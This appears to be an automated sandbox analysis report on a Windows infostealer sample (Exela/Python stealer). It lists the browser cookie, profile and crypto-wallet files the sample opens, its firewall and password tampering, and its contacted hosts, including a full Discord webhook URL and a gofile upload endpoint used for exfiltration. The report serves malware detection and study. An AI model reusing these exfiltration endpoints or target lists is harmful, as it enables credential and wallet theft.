Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Exela Stealer
Source: Yara match File source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR
Yara detected Python Stealer
Source: Yara match File source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431281 Sample: SecuriteInfo.com.Win64.Evo-... Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 93 store8.gofile.io 2->93 95 ip-api.com 2->95 97 2 other IPs or domains 2->97 113 Antivirus detection for URL or domain 2->113 115 Antivirus / Scanner detection for submitted sample 2->115 117 Sigma detected: Capture Wi-Fi password 2->117 119 6 other signatures 2->119 10 SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe 58 2->10         started        14 Exela.exe 2->14         started        16 svchost.exe 2->16         started        signatures3 process4 file5 77 C:\Users\...\_quoting_c.cp311-win_amd64.pyd, PE32+ 10->77 dropped 79 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 10->79 dropped 81 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 10->81 dropped 89 29 other malicious files 10->89 dropped 145 Modifies the windows firewall 10->145 147 Tries to harvest and steal WLAN passwords 10->147 149 Gathers network related connection and port information 10->149 18 SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe 134 10->18         started        83 C:\Users\...\_quoting_c.cp311-win_amd64.pyd, PE32+ 14->83 dropped 85 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 14->85 dropped 87 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 14->87 dropped 91 29 other malicious files 14->91 dropped 151 Antivirus detection for dropped file 14->151 153 Multi AV Scanner detection for dropped file 14->153 155 Machine Learning detection for dropped file 14->155 signatures6 process7 dnsIp8 99 ip-api.com 208.95.112.1, 49740, 80 TUT-ASUS United States 18->99 101 api.gofile.io 51.38.43.18, 443, 49760 OVHFR France 18->101 103 4 other IPs or domains 18->103 69 C:\Users\user\AppData\Local\...xela.exe, PE32+ 18->69 dropped 71 C:\Users\user\AppData\...\VLZDGUKUTZ.pdf, ASCII 18->71 dropped 73 C:\Users\user\AppData\...\VLZDGUKUTZ.docx, ASCII 18->73 dropped 75 8 other malicious files 18->75 dropped 121 Found many strings related to Crypto-Wallets (likely being stolen) 18->121 123 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->123 125 Tries to harvest and steal browser information (history, passwords, etc) 18->125 127 5 other signatures 18->127 23 cmd.exe 1 18->23         started        26 cmd.exe 18->26         started        28 cmd.exe 1 18->28         started        30 15 other processes 18->30 file9 signatures10 process11 signatures12 129 Uses netstat to query active network connections and open ports 23->129 131 Uses netsh to modify the Windows network and firewall settings 23->131 133 Uses ipconfig to lookup or modify the Windows network settings 23->133 135 Uses attrib.exe to hide files 23->135 32 conhost.exe 23->32         started        137 Overwrites the password of the administrator account 26->137 139 Gathers network related connection and port information 26->139 141 Performs a network lookup / discovery via ARP 26->141 34 systeminfo.exe 26->34         started        37 net.exe 26->37         started        39 net.exe 26->39         started        47 16 other processes 26->47 41 WMIC.exe 1 28->41         started        43 conhost.exe 28->43         started        143 Tries to harvest and steal WLAN passwords 30->143 45 WMIC.exe 30->45         started        49 28 other processes 30->49 process13 signatures14 105 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 34->105 51 WmiPrvSE.exe 34->51         started        107 Overwrites the password of the administrator account 37->107 53 net1.exe 37->53         started        55 net1.exe 39->55         started        109 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 41->109 111 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 41->111 57 Conhost.exe 45->57         started        59 quser.exe 47->59         started        61 net1.exe 47->61         started        67 2 other processes 47->67 63 chcp.com 49->63         started        65 chcp.com 49->65         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
162.159.137.232
 unknown United States
13335 CLOUDFLARENETUS false
162.159.128.233
 discord.com United States
13335 CLOUDFLARENETUS false
206.168.191.31
 store8.gofile.io United States
21777 MASSIVE-NETWORKSUS false
51.38.43.18
 api.gofile.io France
16276 OVHFR false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
store8.gofile.io 206.168.191.31 true
discord.com 162.159.128.233 true
ip-api.com 208.95.112.1 true
api.gofile.io 51.38.43.18 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://discord.com/api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaLZ2C-YJ8xGzkF6VbqbsY0 false
  • Avira URL Cloud: safe
 unknown
https://store8.gofile.io/uploadFile false
    		high
    http://ip-api.com/json false
      		high